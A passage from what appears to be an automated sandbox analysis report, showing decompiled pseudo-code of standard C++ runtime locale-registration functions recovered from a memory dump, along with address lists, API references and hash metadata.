																																					E6D4924F4(_t594 - 0x20, 0x6d5329cc);
																																					asm("int3");
																																					_push(0x14);
																																					E6D490E9E(0x6d4fe9a2, _t420, _t563, _t577);
																																					E6D476A10(_t594 - 0x14, 0);
																																					_t578 =  *0x6d53fe14; // 0x0
																																					 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																					 *(_t594 - 0x10) = _t578;
																																					_t338 = E6D451D10();
																																					_t500 =  *((intOrPtr*)(_t594 + 8));
																																					_t564 = E6D452140( *((intOrPtr*)(_t594 + 8)), _t338);
																																					__eflags = _t564;
																																					if(_t564 != 0) {
																																						L82:
																																						E6D476A77(_t594 - 0x14);
																																						return E6D490E67(_t564);
																																					} else {
																																						__eflags = _t578;
																																						if(__eflags == 0) {
																																							_push( *((intOrPtr*)(_t594 + 8)));
																																							_push(_t594 - 0x10);
																																							__eflags = E6D482A62(_t420, _t500, _t551, _t564, _t578, __eflags, _t598) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D451940();
																																								E6D4924F4(_t594 - 0x20, 0x6d5329cc);
																																								asm("int3");
																																								_push(0x14);
																																								E6D490E9E(0x6d4fe9a2, _t420, _t564, _t578);
																																								E6D476A10(_t594 - 0x14, 0);
																																								_t579 =  *0x6d53fde4; // 0x0
																																								 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																								 *(_t594 - 0x10) = _t579;
																																								_t351 = E6D451D10();
																																								_t507 =  *((intOrPtr*)(_t594 + 8));
																																								_t565 = E6D452140( *((intOrPtr*)(_t594 + 8)), _t351);
																																								__eflags = _t565;
																																								if(_t565 != 0) {
																																									L89:
																																									E6D476A77(_t594 - 0x14);
																																									return E6D490E67(_t565);
																																								} else {
																																									__eflags = _t579;
																																									if(__eflags == 0) {
																																										_push( *((intOrPtr*)(_t594 + 8)));
																																										_push(_t594 - 0x10);
																																										__eflags = E6D482AC8(_t420, _t507, _t551, _t565, _t579, __eflags, _t598) - 0xffffffff;
																																										if(__eflags == 0) {
																																											_t511 = _t594 - 0x20;
																																											E6D451940();
																																											E6D4924F4(_t594 - 0x20, 0x6d5329cc);
																																											asm("int3");
																																											_push(4);
																																											E6D490E9E(0x6d4fefbc, _t420, _t565, _t579);
																																											_t580 = _t511;
																																											 *(_t594 - 0x10) = _t580;
																																											 *((intOrPtr*)(_t580 + 4)) =  *((intOrPtr*)(_t594 + 0xc));
																																											_push( *((intOrPtr*)(_t594 + 0x14)));
																																											_push( *((intOrPtr*)(_t594 + 8)));
																																											_t189 = _t594 - 4;
																																											 *_t189 =  *(_t594 - 4) & 0x00000000;
																																											__eflags =  *_t189;
																																											 *_t580 = 0x6d5041ac;
																																											 *((char*)(_t580 + 0x28)) =  *((intOrPtr*)(_t594 + 0x10));
																																											E6D4868B7(_t420, _t511, _t551, _t565, _t580,  *_t189, _t598);
																																											return E6D490E67(_t580);
																																										} else {
																																											_t565 =  *(_t594 - 0x10);
																																											 *(_t594 - 0x10) = _t565;
																																											 *(_t594 - 4) = 1;
																																											E6D478A0B(__eflags, _t565);
																																											 *0x6d5001e8();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t565 + 4))))();
																																											 *0x6d53fde4 = _t565;
																																											goto L89;
																																										}
																																									} else {
																																										_t565 = _t579;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t564 =  *(_t594 - 0x10);
																																								 *(_t594 - 0x10) = _t564;
																																								 *(_t594 - 4) = 1;
																																								E6D478A0B(__eflags, _t564);
																																								 *0x6d5001e8();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t564 + 4))))();
																																								 *0x6d53fe14 = _t564;
																																								goto L82;
																																							}
																																						} else {
																																							_t564 = _t578;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t563 =  *(_t594 - 0x10);
																																					 *(_t594 - 0x10) = _t563;
																																					 *(_t594 - 4) = 1;
																																					E6D478A0B(__eflags, _t563);
																																					 *0x6d5001e8();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t563 + 4))))();
																																					 *0x6d53fde0 = _t563;
																																					goto L75;
																																				}
																																			} else {
																																				_t563 = _t577;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t562 =  *(_t594 - 0x10);
																																		 *(_t594 - 0x10) = _t562;
																																		 *(_t594 - 4) = 1;
																																		E6D478A0B(__eflags, _t562);
																																		 *0x6d5001e8();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t562 + 4))))();
																																		 *0x6d53fe10 = _t562;
																																		goto L68;
																																	}
																																} else {
																																	_t562 = _t576;
																																	goto L68;
																																}
																															}
																														} else {
																															_t561 =  *(_t594 - 0x10);
																															 *(_t594 - 0x10) = _t561;
																															 *(_t594 - 4) = 1;
																															E6D478A0B(__eflags, _t561);
																															 *0x6d5001e8();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t561 + 4))))();
																															 *0x6d53fdf4 = _t561;
																															goto L61;
																														}
																													} else {
																														_t561 = _t575;
																														goto L61;
																													}
																												}
																											} else {
																												_t560 =  *(_t594 - 0x10);
																												 *(_t594 - 0x10) = _t560;
																												 *(_t594 - 4) = 1;
																												E6D478A0B(__eflags, _t560);
																												 *0x6d5001e8();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t560 + 4))))();
																												 *0x6d53fdf0 = _t560;
																												goto L54;
																											}
																										} else {
																											_t560 = _t574;
																											goto L54;
																										}
																									}
																								} else {
																									_t559 =  *(_t594 - 0x10);
																									 *(_t594 - 0x10) = _t559;
																									 *(_t594 - 4) = 1;
																									E6D478A0B(__eflags, _t559);
																									 *0x6d5001e8();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t559 + 4))))();
																									 *0x6d53fdc4 = _t559;
																									goto L47;
																								}
																							} else {
																								_t559 = _t573;
																								goto L47;
																							}
																						}
																					} else {
																						_t558 =  *(_t594 - 0x10);
																						 *(_t594 - 0x10) = _t558;
																						 *(_t594 - 4) = 1;
																						E6D478A0B(__eflags, _t558);
																						 *0x6d5001e8();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t558 + 4))))();
																						 *0x6d53fdec = _t558;
																						goto L40;
																					}
																				} else {
																					_t558 = _t572;
																					goto L40;
																				}
																			}
																		} else {
																			_t557 =  *(_t594 - 0x10);
																			 *(_t594 - 0x10) = _t557;
																			 *(_t594 - 4) = 1;
																			E6D478A0B(__eflags, _t557);
																			 *0x6d5001e8();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t557 + 4))))();
																			 *0x6d53fdd8 = _t557;
																			goto L33;
																		}
																	} else {
																		_t557 = _t571;
																		goto L33;
																	}
																}
															} else {
																_t556 =  *(_t594 - 0x10);
																 *(_t594 - 0x10) = _t556;
																 *(_t594 - 4) = 1;
																E6D478A0B(__eflags, _t556);
																 *0x6d5001e8();
																 *((intOrPtr*)( *((intOrPtr*)( *_t556 + 4))))();
																 *0x6d53fddc = _t556;
																goto L26;
															}
														} else {
															_t556 = _t570;
															goto L26;
														}
													}
												} else {
													_t555 =  *(_t594 - 0x10);
													 *(_t594 - 0x10) = _t555;
													 *(_t594 - 4) = 1;
													E6D478A0B(__eflags, _t555);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t555 + 4))))();
													 *0x6d53fe08 = _t555;
													goto L19;
												}
											} else {
												_t555 = _t569;
												goto L19;
											}
										}
									} else {
										_t554 =  *(_t594 - 0x10);
										 *(_t594 - 0x10) = _t554;
										 *(_t594 - 4) = 1;
										E6D478A0B(__eflags, _t554);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t554 + 4))))();
										 *0x6d53fe0c = _t554;
										goto L12;
									}
								} else {
									_t554 = _t568;
									goto L12;
								}
							}
						} else {
							_t553 =  *(_t594 - 0x10);
							 *(_t594 - 0x10) = _t553;
							 *(_t594 - 4) = 1;
							E6D478A0B(__eflags, _t553);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t553 + 4))))();
							 *0x6d53fdd4 = _t553;
							goto L5;
						}
					} else {
						_t553 = _t567;
						goto L5;
					}
				}
			}

0x6d480950
0x6d480950
0x6d480950
0x6d480957
0x6d480961
0x6d480966
0x6d480971
0x6d480975
0x6d480978
0x6d48097d
0x6d480981
0x6d480986
0x6d48098a
0x6d4809cf
0x6d4809d2
0x6d4809de
0x6d48098c
0x6d48098e
0x6d480994
0x6d48099a
0x6d4809a2
0x6d4809a5
0x6d4809e2
0x6d4809f0
0x6d4809f5
0x6d4809f6
0x6d4809fd
0x6d480a07
0x6d480a0c
0x6d480a17
0x6d480a1b
0x6d480a1e
0x6d480a23
0x6d480a2c
0x6d480a2e
0x6d480a30
0x6d480a75
0x6d480a78
0x6d480a84
0x6d480a32
0x6d480a32
0x6d480a34
0x6d480a3a
0x6d480a40
0x6d480a48
0x6d480a4b
0x6d480a88
0x6d480a96
0x6d480a9b
0x6d480a9c
0x6d480aa3
0x6d480aad
0x6d480ab2
0x6d480abd
0x6d480ac1
0x6d480ac4
0x6d480ac9
0x6d480ad2
0x6d480ad4
0x6d480ad6
0x6d480b1b
0x6d480b1e
0x6d480b2a
0x6d480ad8
0x6d480ad8
0x6d480ada
0x6d480ae0
0x6d480ae6
0x6d480aee
0x6d480af1
0x6d480b2e
0x6d480b3c
0x6d480b41
0x6d480b42
0x6d480b49
0x6d480b53
0x6d480b58
0x6d480b63
0x6d480b67
0x6d480b6a
0x6d480b6f
0x6d480b78
0x6d480b7a
0x6d480b7c
0x6d480bc1
0x6d480bc4
0x6d480bd0
0x6d480b7e
0x6d480b7e
0x6d480b80
0x6d480b86
0x6d480b8c
0x6d480b94
0x6d480b97
0x6d480bd4
0x6d480be2
0x6d480be7
0x6d480be8
0x6d480bef
0x6d480bf9
0x6d480bfe
0x6d480c09
0x6d480c0d
0x6d480c10
0x6d480c15
0x6d480c1e
0x6d480c20
0x6d480c22
0x6d480c67
0x6d480c6a
0x6d480c76
0x6d480c24
0x6d480c24
0x6d480c26
0x6d480c2c
0x6d480c32
0x6d480c3a
0x6d480c3d
0x6d480c7a
0x6d480c88
0x6d480c8d
0x6d480c8e
0x6d480c95
0x6d480c9f
0x6d480ca4
0x6d480caf
0x6d480cb3
0x6d480cb6
0x6d480cbb
0x6d480cc4
0x6d480cc6
0x6d480cc8
0x6d480d0d
0x6d480d10
0x6d480d1c
0x6d480cca
0x6d480cca
0x6d480ccc
0x6d480cd2
0x6d480cd8
0x6d480ce0
0x6d480ce3
0x6d480d20
0x6d480d2e
0x6d480d33
0x6d480d34
0x6d480d3b
0x6d480d45
0x6d480d4a
0x6d480d55
0x6d480d59
0x6d480d5c
0x6d480d61
0x6d480d6a
0x6d480d6c
0x6d480d6e
0x6d480db3
0x6d480db6
0x6d480dc2
0x6d480d70
0x6d480d70
0x6d480d72
0x6d480d78
0x6d480d7e
0x6d480d86
0x6d480d89
0x6d480dc6
0x6d480dd4
0x6d480dd9
0x6d480dda
0x6d480de1
0x6d480deb
0x6d480df0
0x6d480dfb
0x6d480dff
0x6d480e02
0x6d480e07
0x6d480e10
0x6d480e12
0x6d480e14
0x6d480e59
0x6d480e5c
0x6d480e68
0x6d480e16
0x6d480e16
0x6d480e18
0x6d480e1e
0x6d480e24
0x6d480e2c
0x6d480e2f
0x6d480e6c
0x6d480e7a
0x6d480e7f
0x6d480e80
0x6d480e87
0x6d480e91
0x6d480e96
0x6d480ea1
0x6d480ea5
0x6d480ea8
0x6d480ead
0x6d480eb6
0x6d480eb8
0x6d480eba
0x6d480eff
0x6d480f02
0x6d480f0e
0x6d480ebc
0x6d480ebc
0x6d480ebe
0x6d480ec4
0x6d480eca
0x6d480ed2
0x6d480ed5
0x6d480f12
0x6d480f20
0x6d480f25
0x6d480f26
0x6d480f2d
0x6d480f37
0x6d480f3c
0x6d480f47
0x6d480f4b
0x6d480f4e
0x6d480f53
0x6d480f5c
0x6d480f5e
0x6d480f60
0x6d480fa5
0x6d480fa8
0x6d480fb4
0x6d480f62
0x6d480f62
0x6d480f64
0x6d480f6a
0x6d480f70
0x6d480f78
0x6d480f7b
0x6d480fb8
0x6d480fc6
0x6d480fcb
0x6d480fcc
0x6d480fd3
0x6d480fdd
0x6d480fe2
0x6d480fed
0x6d480ff1
0x6d480ff4
0x6d480ff9
0x6d481002
0x6d481004
0x6d481006
0x6d48104b
0x6d48104e
0x6d48105a
0x6d481008
0x6d481008
0x6d48100a
0x6d481010
0x6d481016
0x6d48101e
0x6d481021
0x6d48105e
0x6d48106c
0x6d481071
0x6d481072
0x6d481079
0x6d481083
0x6d481088
0x6d481093
0x6d481097
0x6d48109a
0x6d48109f
0x6d4810a8
0x6d4810aa
0x6d4810ac
0x6d4810f1
0x6d4810f4
0x6d481100
0x6d4810ae
0x6d4810ae
0x6d4810b0
0x6d4810b6
0x6d4810bc
0x6d4810c4
0x6d4810c7
0x6d481104
0x6d481112
0x6d481117
0x6d481118
0x6d48111f
0x6d481129
0x6d48112e
0x6d481139
0x6d48113d
0x6d481140
0x6d481145
0x6d48114e
0x6d481150
0x6d481152
0x6d481197
0x6d48119a
0x6d4811a6
0x6d481154
0x6d481154
0x6d481156
0x6d48115c
0x6d481162
0x6d48116a
0x6d48116d
0x6d4811a7
0x6d4811aa
0x6d4811b8
0x6d4811bd
0x6d4811be
0x6d4811c5
0x6d4811ca
0x6d4811cc
0x6d4811d2
0x6d4811d5
0x6d4811db
0x6d4811de
0x6d4811de
0x6d4811de
0x6d4811e2
0x6d4811e8
0x6d4811eb
0x6d4811f7
0x6d48116f
0x6d48116f
0x6d481172
0x6d481176
0x6d48117a
0x6d481187
0x6d48118f
0x6d481191
0x00000000
0x6d481191
0x6d481158
0x6d481158
0x00000000
0x6d481158
0x6d481156
0x6d4810c9
0x6d4810c9
0x6d4810cc
0x6d4810d0
0x6d4810d4
0x6d4810e1
0x6d4810e9
0x6d4810eb
0x00000000
0x6d4810eb
0x6d4810b2
0x6d4810b2
0x00000000
0x6d4810b2
0x6d4810b0
0x6d481023
0x6d481023
0x6d481026
0x6d48102a
0x6d48102e
0x6d48103b
0x6d481043
0x6d481045
0x00000000
0x6d481045
0x6d48100c
0x6d48100c
0x00000000
0x6d48100c
0x6d48100a
0x6d480f7d
0x6d480f7d
0x6d480f80
0x6d480f84
0x6d480f88
0x6d480f95
0x6d480f9d
0x6d480f9f
0x00000000
0x6d480f9f
0x6d480f66
0x6d480f66
0x00000000
0x6d480f66
0x6d480f64
0x6d480ed7
0x6d480ed7
0x6d480eda
0x6d480ede
0x6d480ee2
0x6d480eef
0x6d480ef7
0x6d480ef9
0x00000000
0x6d480ef9
0x6d480ec0
0x6d480ec0
0x00000000
0x6d480ec0
0x6d480ebe
0x6d480e31
0x6d480e31
0x6d480e34
0x6d480e38
0x6d480e3c
0x6d480e49
0x6d480e51
0x6d480e53
0x00000000
0x6d480e53
0x6d480e1a
0x6d480e1a
0x00000000
0x6d480e1a
0x6d480e18
0x6d480d8b
0x6d480d8b
0x6d480d8e
0x6d480d92
0x6d480d96
0x6d480da3
0x6d480dab
0x6d480dad
0x00000000
0x6d480dad
0x6d480d74
0x6d480d74
0x00000000
0x6d480d74
0x6d480d72
0x6d480ce5
0x6d480ce5
0x6d480ce8
0x6d480cec
0x6d480cf0
0x6d480cfd
0x6d480d05
0x6d480d07
0x00000000
0x6d480d07
0x6d480cce
0x6d480cce
0x00000000
0x6d480cce
0x6d480ccc
0x6d480c3f
0x6d480c3f
0x6d480c42
0x6d480c46
0x6d480c4a
0x6d480c57
0x6d480c5f
0x6d480c61
0x00000000
0x6d480c61
0x6d480c28
0x6d480c28
0x00000000
0x6d480c28
0x6d480c26
0x6d480b99
0x6d480b99
0x6d480b9c
0x6d480ba0
0x6d480ba4
0x6d480bb1
0x6d480bb9
0x6d480bbb
0x00000000
0x6d480bbb
0x6d480b82
0x6d480b82
0x00000000
0x6d480b82
0x6d480b80
0x6d480af3
0x6d480af3
0x6d480af6
0x6d480afa
0x6d480afe
0x6d480b0b
0x6d480b13
0x6d480b15
0x00000000
0x6d480b15
0x6d480adc
0x6d480adc
0x00000000
0x6d480adc
0x6d480ada
0x6d480a4d
0x6d480a4d
0x6d480a50
0x6d480a54
0x6d480a58
0x6d480a65
0x6d480a6d
0x6d480a6f
0x00000000
0x6d480a6f
0x6d480a36
0x6d480a36
0x00000000
0x6d480a36
0x6d480a34
0x6d4809a7
0x6d4809a7
0x6d4809aa
0x6d4809ae
0x6d4809b2
0x6d4809bf
0x6d4809c7
0x6d4809c9
0x00000000
0x6d4809c9
0x6d480990
0x6d480990
0x00000000
0x6d480990
0x6d48098e

APIs

__EH_prolog3.LIBCMT ref: 6D480957
std::_Lockit::_Lockit.LIBCPMT ref: 6D480961

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D4809B2
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4809D2
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4809F0

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 9ac6253f4558ef14a151622e27e2ebf6923aea6d13917af3436a36ee47abdba9
Instruction ID: 79edab8c93175075049ccbc22e27aaddad4a8d8bf4e9fd0dc66c7a30cde1445d
Opcode Fuzzy Hash: 9ac6253f4558ef14a151622e27e2ebf6923aea6d13917af3436a36ee47abdba9
Instruction Fuzzy Hash: E011AC72805129CBCF15DFA5C854EEE7775AF85358F26040DE614AB290DF34DE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47B9F2, Relevance: 7.6, APIs: 5, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6D47B9F2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				intOrPtr* _v28;
				char _v32;
				char _v36;
				void* _t49;
				intOrPtr* _t50;
				void* _t62;
				void* _t75;
				intOrPtr* _t120;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr* _t137;
				void* _t138;
				void* _t150;

				_t99 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10( &_v20, 0);
				_t136 =  *0x6d53fd68; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t136;
				_t49 = E6D451D10();
				_t102 = _a8;
				_t50 = E6D452140(_a8, _t49);
				_t132 = _t50;
				if(_t50 != 0) {
					L5:
					E6D476A77( &_v20);
					return E6D490E67(_t132);
				} else {
					if(_t136 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6D47C0CA(__ebx, _t102, __edx, _t132, _t136, __eflags, _t150) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4( &_v32, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t132, _t136);
							E6D476A10( &_v20, 0);
							_t137 =  *0x6d53fd6c; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t137;
							_t62 = E6D451D10();
							_t109 = _a8;
							_t133 = E6D452140(_a8, _t62);
							__eflags = _t133;
							if(_t133 != 0) {
								L12:
								E6D476A77( &_v20);
								return E6D490E67(_t133);
							} else {
								__eflags = _t137;
								if(__eflags == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6D47C132(__ebx, _t109, __edx, _t133, _t137, __eflags, _t150) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4( &_v32, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t99, _t133, _t137);
										E6D476A10( &_v20, 0);
										_t138 =  *0x6d53fd70; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t138;
										_t75 = E6D451D10();
										_t116 = _a8;
										_t134 = E6D452140(_a8, _t75);
										__eflags = _t134;
										if(_t134 != 0) {
											L19:
											E6D476A77( &_v20);
											return E6D490E67(_t134);
										} else {
											__eflags = _t138;
											if(__eflags == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6D47C19A(_t99, _t116, __edx, _t134, _t138, __eflags, _t150) - 0xffffffff;
												if(__eflags == 0) {
													_t120 =  &_v36;
													E6D451940();
													E6D4924F4( &_v36, 0x6d5329cc);
													asm("int3");
													_push(_t120);
													 *((intOrPtr*)(_t120 + 4)) = _v12;
													_v28 = _t120;
													 *_t120 = 0x6d5019fc;
													return _t120;
												} else {
													_t134 = _v16;
													_v16 = _t134;
													_v4 = 1;
													E6D478A0B(__eflags, _t134);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t134 + 4))))();
													 *0x6d53fd70 = _t134;
													goto L19;
												}
											} else {
												_t134 = _t138;
												goto L19;
											}
										}
									} else {
										_t133 = _v16;
										_v16 = _t133;
										_v4 = 1;
										E6D478A0B(__eflags, _t133);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t133 + 4))))();
										 *0x6d53fd6c = _t133;
										goto L12;
									}
								} else {
									_t133 = _t137;
									goto L12;
								}
							}
						} else {
							_t132 = _v16;
							_v16 = _t132;
							_v4 = 1;
							E6D478A0B(__eflags, _t132);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 4))))();
							 *0x6d53fd68 = _t132;
							goto L5;
						}
					} else {
						_t132 = _t136;
						goto L5;
					}
				}
			}

0x6d47b9f2
0x6d47b9f2
0x6d47b9f9
0x6d47ba03
0x6d47ba08
0x6d47ba13
0x6d47ba17
0x6d47ba1a
0x6d47ba1f
0x6d47ba23
0x6d47ba28
0x6d47ba2c
0x6d47ba71
0x6d47ba74
0x6d47ba80
0x6d47ba2e
0x6d47ba30
0x6d47ba36
0x6d47ba3c
0x6d47ba44
0x6d47ba47
0x6d47ba84
0x6d47ba92
0x6d47ba97
0x6d47ba98
0x6d47ba9f
0x6d47baa9
0x6d47baae
0x6d47bab9
0x6d47babd
0x6d47bac0
0x6d47bac5
0x6d47bace
0x6d47bad0
0x6d47bad2
0x6d47bb17
0x6d47bb1a
0x6d47bb26
0x6d47bad4
0x6d47bad4
0x6d47bad6
0x6d47badc
0x6d47bae2
0x6d47baea
0x6d47baed
0x6d47bb2a
0x6d47bb38
0x6d47bb3d
0x6d47bb3e
0x6d47bb45
0x6d47bb4f
0x6d47bb54
0x6d47bb5f
0x6d47bb63
0x6d47bb66
0x6d47bb6b
0x6d47bb74
0x6d47bb76
0x6d47bb78
0x6d47bbbd
0x6d47bbc0
0x6d47bbcc
0x6d47bb7a
0x6d47bb7a
0x6d47bb7c
0x6d47bb82
0x6d47bb88
0x6d47bb90
0x6d47bb93
0x6d47bbcd
0x6d47bbd0
0x6d47bbde
0x6d47bbe3
0x6d47bbe7
0x6d47bbeb
0x6d47bbf0
0x6d47bbf3
0x6d47bbfa
0x6d47bb95
0x6d47bb95
0x6d47bb98
0x6d47bb9c
0x6d47bba0
0x6d47bbad
0x6d47bbb5
0x6d47bbb7
0x00000000
0x6d47bbb7
0x6d47bb7e
0x6d47bb7e
0x00000000
0x6d47bb7e
0x6d47bb7c
0x6d47baef
0x6d47baef
0x6d47baf2
0x6d47baf6
0x6d47bafa
0x6d47bb07
0x6d47bb0f
0x6d47bb11
0x00000000
0x6d47bb11
0x6d47bad8
0x6d47bad8
0x00000000
0x6d47bad8
0x6d47bad6
0x6d47ba49
0x6d47ba49
0x6d47ba4c
0x6d47ba50
0x6d47ba54
0x6d47ba61
0x6d47ba69
0x6d47ba6b
0x00000000
0x6d47ba6b
0x6d47ba32
0x6d47ba32
0x00000000
0x6d47ba32
0x6d47ba30

APIs

__EH_prolog3.LIBCMT ref: 6D47B9F9
std::_Lockit::_Lockit.LIBCPMT ref: 6D47BA03

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D47BA54
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47BA74
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47BA92

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 53b523744640f9b22238500d7426eceabd7a7a08a11717a14ed15d9745e94693
Instruction ID: 138878d2f34deaac6d5ac750ce45965dff2197b52e02461f7c5820766d997cd0
Opcode Fuzzy Hash: 53b523744640f9b22238500d7426eceabd7a7a08a11717a14ed15d9745e94693
Instruction Fuzzy Hash: 0F119A36C082298BCF25DBA4C884EEE77B5AF85324F26040DD615AB290DF349E05CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480804, Relevance: 7.6, APIs: 5, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6D480804(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t223;
				signed int _t224;
				void* _t236;
				void* _t249;
				void* _t262;
				void* _t275;
				void* _t288;
				void* _t301;
				void* _t314;
				void* _t327;
				void* _t340;
				void* _t353;
				void* _t366;
				void* _t379;
				void* _t392;
				void* _t405;
				signed int _t587;
				signed int _t636;
				signed int _t637;
				signed int _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t642;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				signed int _t646;
				signed int _t647;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				signed int _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				signed int _t666;
				void* _t682;
				void* _t686;

				_t633 = __edx;
				_t482 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t682 - 0x14, 0);
				_t651 =  *0x6d53fdd0; // 0x0
				 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
				 *(_t682 - 0x10) = _t651;
				_t223 = E6D451D10();
				_t485 =  *((intOrPtr*)(_t682 + 8));
				_t224 = E6D452140( *((intOrPtr*)(_t682 + 8)), _t223);
				_t635 = _t224;
				if(_t224 != 0) {
					L5:
					E6D476A77(_t682 - 0x14);
					return E6D490E67(_t635);
				} else {
					if(_t651 == 0) {
						_push( *((intOrPtr*)(_t682 + 8)));
						_push(_t682 - 0x10);
						__eflags = E6D48248D(__ebx, _t485, __edx, _t635, _t651, __eflags, _t686) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t682 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t635, _t651);
							E6D476A10(_t682 - 0x14, 0);
							_t652 =  *0x6d53fe04; // 0x0
							 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
							 *(_t682 - 0x10) = _t652;
							_t236 = E6D451D10();
							_t492 =  *((intOrPtr*)(_t682 + 8));
							_t636 = E6D452140( *((intOrPtr*)(_t682 + 8)), _t236);
							__eflags = _t636;
							if(_t636 != 0) {
								L12:
								E6D476A77(_t682 - 0x14);
								return E6D490E67(_t636);
							} else {
								__eflags = _t652;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t682 + 8)));
									_push(_t682 - 0x10);
									__eflags = E6D4824F5(_t482, _t492, __edx, _t636, _t652, __eflags, _t686) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t682 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t482, _t636, _t652);
										E6D476A10(_t682 - 0x14, 0);
										_t653 =  *0x6d53fdd4; // 0x0
										 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
										 *(_t682 - 0x10) = _t653;
										_t249 = E6D451D10();
										_t499 =  *((intOrPtr*)(_t682 + 8));
										_t637 = E6D452140( *((intOrPtr*)(_t682 + 8)), _t249);
										__eflags = _t637;
										if(_t637 != 0) {
											L19:
											E6D476A77(_t682 - 0x14);
											return E6D490E67(_t637);
										} else {
											__eflags = _t653;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t682 + 8)));
